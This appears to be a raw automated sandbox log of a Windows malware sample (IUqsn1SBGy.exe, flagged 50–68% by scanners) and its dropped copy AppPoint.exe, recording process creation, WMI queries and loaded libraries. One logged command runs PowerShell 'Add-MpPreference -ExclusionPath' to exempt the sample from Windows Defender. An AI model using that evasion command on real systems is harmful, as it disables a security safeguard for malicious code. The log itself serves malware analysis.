Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Mutant created: \Sessions\1\BaseNamedObjects\yQWXJLThlnF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0baoyk3y.dfs.ps1

Jump to behavior

Source: IUqsn1SBGy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: IUqsn1SBGy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IUqsn1SBGy.exe	Virustotal: Detection: 50%
Source: IUqsn1SBGy.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File read: C:\Users\user\Desktop\IUqsn1SBGy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IUqsn1SBGy.exe "C:\Users\user\Desktop\IUqsn1SBGy.exe"
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Users\user\Desktop\IUqsn1SBGy.exe "C:\Users\user\Desktop\IUqsn1SBGy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IUqsn1SBGy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process created: C:\Users\user\Desktop\IUqsn1SBGy.exe "C:\Users\user\Desktop\IUqsn1SBGy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Process created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe "C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: schannel.dll	Jump to behavior
